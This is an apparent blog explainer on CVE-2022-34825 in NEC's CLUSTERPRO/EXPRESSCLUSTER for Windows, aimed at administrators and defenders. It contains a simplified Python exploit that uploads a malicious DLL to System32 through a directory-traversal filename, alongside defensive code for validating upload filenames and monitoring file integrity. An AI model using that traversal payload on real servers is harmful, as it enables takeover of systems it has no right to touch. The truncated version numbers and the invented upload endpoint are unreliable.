In summer 2022, a critical vulnerability was disclosed under the identifier CVE-2022-34825. It affects several NEC disaster recovery and clustering products for Windows: CLUSTERPRO X 5. and earlier, EXPRESSCLUSTER X 5. and earlier, and their SingleServerSafe variants. If you run or manage any of these, pay attention: a remote, unauthenticated attacker can use this bug to overwrite files on your server and possibly run their own code. Let's break it down in simple terms, walk through how someone might exploit it, and look at how you can stay protected.

What is CVE-2022-34825?

At its core, CVE-2022-34825 is an "Uncontrolled Search Path Element" vulnerability. That class of bug means the software looks for executables or DLLs without safely controlling where it searches, so an attacker who can place a malicious file in one of the searched locations can trick the application into loading and executing it.

In this specific case things are worse: a remote, unauthenticated attacker (anyone with network access to the service, no login needed) can overwrite files anywhere on the Windows machine, including key operating system files or application binaries. From there they could possibly execute arbitrary code with the privileges of the affected service, which usually means SYSTEM or Administrator.

Affected Products

- CLUSTERPRO X 5. and earlier (including the SingleServerSafe variant)
- EXPRESSCLUSTER X 5. and earlier
- EXPRESSCLUSTER X 5. SingleServerSafe for Windows and earlier

Full details: NEC Security Advisory (Japanese)

A Simple View

The application uses external resources (like DLLs or config files) stored in directories such as C:\Program Files\NEC\CLUSTERPRO\, but it doesn't strictly control its search path, nor does it properly sanitize filenames. An attacker can send crafted requests to the vulnerable service, tricking it into writing files to chosen locations—even overwriting existing system files.

In practice this gives an attacker two capabilities:

1. Overwriting any file on the system.

2. Triggering execution of planted malicious code (if the attacker can control both the location and the file content).

Example Exploit (Simplified)

> Disclaimer: This is a simplified example for educational purposes only. Testing against any system you do not own is illegal.

Assume the target exposes a vulnerable HTTP or RPC interface on port 29003 (default for EXPRESSCLUSTER). An attacker can upload a crafted DLL file to a sensitive location; for instance, replacing an important DLL in the application’s path.

Here's a simplified Python snippet showing how a malicious DLL could be sent:

```python
import requests

# Target server details
target_ip = '192.168.1.100'
target_port = 29003

# Path to the malicious DLL (attacker must prepare this beforehand)
malicious_dll = b'MZ...'  # Malicious content starting with 'MZ' (DLL magic bytes)

# API endpoint (example, adjust path as needed)
upload_url = f'http://{target_ip}:{target_port}/vulnerable_upload'

# The directory traversal payload to overwrite an important DLL file
payload = {
    'file': ('..\\..\\Windows\\System32\\evil.dll', malicious_dll)
}

# Send the malicious file to the server
res = requests.post(upload_url, files=payload)

if res.status_code == 200:
    print("[+] DLL uploaded successfully!")
else:
    print("[-] Upload failed:", res.text)
```

Note: The actual endpoint and parameter names depend on the product configuration and version; the upload path in the snippet is illustrative. The core idea is to abuse missing input validation, using a directory traversal sequence (..\) in the filename to make the service write a crafted file somewhere else on the server.
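The missing validation described in "A Simple View" and in the note above is the server-side half of the problem, so here is what a hardened upload handler looks like. This is an added example, not NEC's code and not how the product validates uploads; the handler, its base directory and the extension allow-list are assumptions. It validates the client-supplied name with Windows path semantics (so it behaves identically when tested on any OS) and then writes with O_EXCL so an existing file can never be replaced through this path even if a later validation bug let a bad name through.

```python
"""Hardened filename handling for a file-upload endpoint.

Added example, not NEC code: the handler, base directory and extension
allow-list are assumptions. The client name is never treated as a path;
anything that is not a bare filename with an allowed extension is
rejected rather than "cleaned", because cleaning is where traversal
filters usually go wrong.
"""
import os
from pathlib import PureWindowsPath

# Windows device names; a request to write "NUL" or "CON.conf" is never a real upload.
_RESERVED = {"CON", "PRN", "AUX", "NUL",
             *(f"COM{i}" for i in range(1, 10)),
             *(f"LPT{i}" for i in range(1, 10))}


class UnsafeFilenameError(ValueError):
    """The client-supplied name must not be used to build a path."""


def safe_upload_path(base_dir, client_filename, allowed_ext=(".conf", ".xml")):
    """Return base_dir joined with a validated bare filename, or raise."""
    p = PureWindowsPath(client_filename)
    if p.drive or p.root:
        raise UnsafeFilenameError("absolute, drive-relative or UNC path")
    if len(p.parts) != 1:
        # '..\\..\\x', 'sub\\x', 'sub/x' and 'a\\..\\x' all have more than one part
        raise UnsafeFilenameError("directory components are not allowed")
    name = p.parts[0]
    if name in (".", "..") or "\x00" in name or name != name.rstrip(" ."):
        # Windows silently drops trailing spaces/dots, so reject names that rely on that
        raise UnsafeFilenameError("malformed name")
    if ":" in name:
        # 'x.dll:cfg.conf' would write an NTFS alternate data stream onto x.dll
        raise UnsafeFilenameError("NTFS stream syntax is not allowed")
    if name.split(".")[0].upper() in _RESERVED:
        raise UnsafeFilenameError("reserved device name")
    if p.suffix.lower() not in allowed_ext:
        raise UnsafeFilenameError(f"extension {p.suffix!r} is not allowed")
    return str(PureWindowsPath(base_dir) / name)


def is_rejected(base_dir, client_filename):
    """True when the validator refuses the name (handy for tests and logging)."""
    try:
        safe_upload_path(base_dir, client_filename)
    except UnsafeFilenameError:
        return True
    return False


def write_upload_once(path, data):
    """Create the file only if it does not exist yet; never clobber.

    O_EXCL makes the existence check and the create a single atomic step,
    so a pre-existing DLL, binary or config cannot be overwritten here.
    """
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return len(data)


def demo_write_once():
    """Show the no-clobber guarantee on a throwaway directory.

    Returns (bytes_written_first_time, second_write_refused).
    """
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "cluster.conf")          # constructed sample file
        n = write_upload_once(target, b"cluster=demo\n")  # constructed sample content
        try:
            write_upload_once(target, b"overwrite attempt\n")
            refused = False
        except FileExistsError:
            refused = True
        return n, refused


if __name__ == "__main__":
    base = "C:\\Program Files\\NEC\\CLUSTERPRO\\etc"   # assumed upload directory
    for candidate in ("cluster.conf", "..\\..\\Windows\\System32\\evil.dll",
                      "C:\\Windows\\x.conf", "x.dll:cfg.conf", "CON.conf"):
        print(f"{candidate!r:45} rejected={is_rejected(base, candidate)}")
    print("no-clobber demo:", demo_write_once())
```

Two design choices matter more than the individual checks. First, a single-component check (len(p.parts) != 1) refuses every form of traversal at once instead of trying to strip "..", which is what lets encoded or mixed-separator variants slip past filters. Second, the allow-list of extensions means a handler meant for configuration files cannot be turned into a DLL writer at all, which is the exact outcome the advisory warns about.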

What Could an Attacker Achieve?

- Overwrite critical system files (DLLs or executables)
- Have planted malicious code execute on the next application restart or Windows boot
- Take over the server: read, change, or delete data, install malware, or use the server as a beachhead into the rest of the network

How to Stay Protected

1. Update Now. NEC has released patches and fixed versions. Get the latest software from:

- NEC CLUSTERPRO/EXPRESSCLUSTER Download Center (Japanese)

Reach out to your NEC representative if you need help updating.

2. Restrict Access. Block network access to the CLUSTERPRO/EXPRESSCLUSTER management ports from untrusted networks (use a firewall, network segmentation, a VPN, etc.).

3. Monitor for Changes. Use endpoint protection solutions and SIEM tools to look for suspicious file changes in your cluster software folders.

4. Audit Regularly. Review which services run with high privileges and keep software and Windows patched.
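Step 3 asks you to watch the cluster software folders for unexpected file changes. The following is an added example of that check, not NEC code or a supported tool: it hashes every binary and config file under a root, stores the baseline as JSON, and reports what appeared, changed or vanished since the last run so the result can be shipped to a SIEM. The folder, the watched extensions and the sample files are assumptions; on a real Windows host you would additionally verify Authenticode signatures on any added or modified DLL, which this portable example does not do.

```python
"""Baseline-and-diff file integrity check for a cluster software folder.

Added example, not NEC code: the root folder, the extension set and the
sample files are assumptions. Run it once to record a baseline, then on
a schedule to report drift.
"""
import hashlib
import json
import os

# Assumed set of file types worth alerting on in an HA product's install folder.
WATCHED_EXT = {".dll", ".exe", ".sys", ".conf", ".xml"}


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 so large binaries do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map of relative path -> sha256 for every watched file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in WATCHED_EXT:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = sha256_file(full)
    return baseline


def diff_baselines(old, new):
    """Return {'added', 'modified', 'removed'} lists, each sorted for stable output."""
    return {
        "added": sorted(k for k in new if k not in old),
        "modified": sorted(k for k in new if k in old and new[k] != old[k]),
        "removed": sorted(k for k in old if k not in new),
    }


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Run the check on a constructed folder and return the drift report.

    Simulates the two outcomes the advisory warns about: a DLL that was
    planted into the install tree and a configuration file that was changed.
    """
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.makedirs(bindir)
        # constructed sample files; names are placeholders, not product files
        with open(os.path.join(bindir, "example.dll"), "wb") as f:
            f.write(b"MZ original")
        with open(os.path.join(root, "cluster.conf"), "w") as f:
            f.write("version=1\n")
        with open(os.path.join(root, "readme.txt"), "w") as f:
            f.write("not a watched extension, never reported\n")

        baseline_path = os.path.join(root, "baseline.json")
        save_baseline(build_baseline(root), baseline_path)

        # drift: one planted DLL, one tampered config
        with open(os.path.join(bindir, "planted.dll"), "wb") as f:
            f.write(b"MZ planted")
        with open(os.path.join(root, "cluster.conf"), "w") as f:
            f.write("version=1\nrogue=1\n")

        return diff_baselines(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the baseline file outside the watched tree and on a host the cluster service cannot write to; a baseline that the compromised service can update is worth nothing. Any entry under "added" or "modified" whose extension is .dll or .exe is the event to page on, since that is the exact write primitive this CVE hands an attacker.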

Original References

- NEC Security Advisory N22-015
- JVN#92382551: Uncontrolled Search Path Element in CLUSTERPRO/EXPRESSCLUSTER
- NIST CVE Summary - CVE-2022-34825

Conclusion

CVE-2022-34825 is a serious flaw affecting popular cluster/HA solutions for Windows. Anyone running CLUSTERPRO or EXPRESSCLUSTER X 5. (or earlier) should patch immediately and check for indicators of compromise. Attackers don’t need a password—only network access—to potentially take control of your server. By acting now, you can avoid being the next victim.

Timeline

Published on: 11/08/2022 22:15:00 UTC
Last modified on: 11/09/2022 16:31:00 UTC